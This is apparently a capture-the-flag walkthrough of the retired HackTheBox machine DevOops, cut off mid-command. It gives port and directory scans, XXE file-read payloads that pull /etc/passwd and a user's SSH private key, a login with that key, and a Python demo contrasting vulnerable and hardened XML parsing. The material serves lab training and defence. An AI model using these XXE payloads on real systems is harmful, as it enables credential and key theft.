DevOops is a Medium-rated retired machine on HackTheBox, and also appears on the TJ Null list for OSCP prep.
We begin with a basic TCP/UDP port scan.
TCP/UDP Port Scan and Service Enumeration
nmap -Pn -sT -p- --min-rate 10000 -oN nmap/tcp_ports_scan $IP
nmap --privileged -Pn -sU -p- --min-rate 10000 -oN nmap/udp_ports_scan $IP
No UDP ports come back as open. Bear in mind that a full-range UDP sweep at --min-rate 10000 is a rough check rather than a definitive one: hosts rate-limit the ICMP port-unreachable replies nmap relies on, so unanswered ports are reported as open|filtered and a real service can be missed. Now we perform service enumeration, version detection, and a script scan on the open TCP ports.
nmap -Pn -sT -A -p 22,5000,50627 -oN nmap/tcp_script_scan $IP
Further Discovery and Vulnerability Assessment
With the services and their versions at hand, we can search for any publicly available exploits using searchsploit.
searchsploit openssh 7.2
searchsploit gunicorn
Further searching online also turns up no off-the-shelf exploits for these services, so the web application itself is the next target.
There is a website running on port 5000. Let’s check for some common directories.
ffuf -u http://$IP:5000/FUZZ -w $COMMON_DIRS -e .php,.txt,.html -t 500 -ic -rate 1000 -r -c | tee ffuf/common_dirs.txt
ffuf -u http://$IP:5000/FUZZ -w $MEDIUM_DIRS -e .php,.txt,.html -t 500 -ic -rate 1000 -r -c | tee ffuf/medium_dirs.txt
The page at 10.10.10.91:5000/upload lets us upload XML files containing the elements Author, Subject and Content. Let's create a sample abc.xml as follows and upload it.
<Book>
<Author>Frank</Author>
<Subject>SciFi</Subject>
<Content>Dune</Content>
</Book>
This direction seems promising. The response gives us a dump of new info:
- the server has a user called roosa
- abc.xml has been uploaded to /home/roosa/deploy/src on the server, and can now be accessed at 10.10.10.91:5000/uploads/abc.xml
As expected, browsing to 10.10.10.91:5000/uploads/abc.xml returns the file we just uploaded.
As soon as we see XML, the embers of XXE ignite in our hearts. Let’s fan those embers into flames. If you don’t know what XXE injection is, please check out this post – portswigger.net/web-security/xxe.
Let's create a passwd.xml as follows and upload it.
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<Book>
<Author>Frank</Author>
<Subject>SciFi</Subject>
<Content>&xxe;</Content>
</Book>
Bingo! Now, that’s the XXE injection we all know and love.
The screenshot is cropped, but further down the returned /etc/passwd there is an entry for roosa:
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
Now that we know XXE works, I’d highly suggest you to give a sincere shot at getting to the user shell on your own before proceeding further with this write-up.
The fruits of one’s own work are always the sweetest.
Enumeration
Since we are able to read files on the server, let's be a little ambitious and try to read files from roosa's home directory. SSH is open, so roosa's id_rsa private key is a good target. Let's try reading the following files:
/home/roosa/user.txt
/home/roosa/.ssh/id_rsa
We can exfiltrate both of them with user.xml and id_rsa.xml as shown below. All you need to do is change /etc/passwd in the entity declaration to the respective user.txt and id_rsa paths.
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/user.txt"> ]>
<Book>
<Author>Frank</Author>
<Subject>SciFi</Subject>
<Content>&xxe;</Content>
</Book>
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<Book>
<Author>Frank</Author>
<Subject>SciFi</Subject>
<Content>&xxe;</Content>
</Book>
Naaice! We got roosa's SSH private key. Let's copy it into a file on our local machine, roosa_id_rsa. Check that the BEGIN and END lines are intact and that the line breaks survived the copy, since a key that has been flattened onto a single line will be rejected by ssh with an "invalid format" error.
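The three uploads above (passwd.xml, user.xml and id_rsa.xml) all work for the same reason: the server-side parser resolves the external entity declared in the DOCTYPE and substitutes the file's contents into Content, which the upload page then echoes back. The script below is an added example and not the DevOops application's code. It uses Python's standard-library xml.sax parser, the kind of parser a gunicorn-hosted Python app would plausibly use, with a constructed stand-in file for /etc/passwd, and shows the vulnerable configuration (external general entities enabled, which was the default before Python 3.7.1) leaking the file, while the same payload yields an empty Content once that feature is off. The Book/Author/Subject/Content layout and the xxe entity name follow the page; the temporary file, its contents and the function names are assumptions made for the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class BookHandler(xml.sax.ContentHandler):
    """Collects the text of Author/Subject/Content, mirroring what the upload page echoes back."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in ("Author", "Subject", "Content"):
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        # Text substituted from an external entity arrives here too, chunk by chunk.
        if self._current:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def parse_book(xml_text: str, resolve_external: bool) -> dict:
    """Parse an uploaded Book document and return its three fields.

    resolve_external=True is the vulnerable setting: the parser fetches whatever
    SYSTEM identifier the DOCTYPE names (file://, http://, ...) and inlines it.
    Python >= 3.7.1 defaults this feature to False; older versions defaulted to True.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = BookHandler()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return handler.fields


def xxe_payload(target_path: str) -> str:
    """Build the same payload shape as passwd.xml / user.xml / id_rsa.xml for any path."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{target_path}"> ]>\n'
        "<Book>\n"
        "<Author>Frank</Author>\n"
        "<Subject>SciFi</Subject>\n"
        "<Content>&xxe;</Content>\n"
        "</Book>\n"
    )


def demo():
    """Return (content from the vulnerable parser, content from the hardened parser)."""
    # Constructed stand-in for /etc/passwd so the demo runs anywhere (assumed sample data).
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        f.write("roosa:x:1002:1002:,,,:/home/roosa:/bin/bash\n")
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_book(payload, resolve_external=True)["Content"]
        safe = parse_book(payload, resolve_external=False)["Content"]
        return leaked, safe
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned: %r" % safe)
```

The hardened parse does not error out; the entity reference simply expands to nothing, which is why a server that silently swallows parse problems still returns a 200 with an empty Content. When testing a target, an empty field for a file that must exist (/etc/passwd) is therefore the signal that external entities are disabled, whereas a 500 usually points at a parser that choked on the DOCTYPE altogether.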
Exploitation
chmod 600 roosa_id_rsa
ssh -i roosa_id_rsa roosa@$IP
Enumeration
Let's start an HTTP server on our local machine to host useful binaries and scripts such as linpeas.sh, which we will then download and run on the DevOops box.
python3 -m http.server 1337 --directory=/home/bob/Code/HTB/bins
roosa@gitter:/tmp$ cd /tmp;
roosa@gi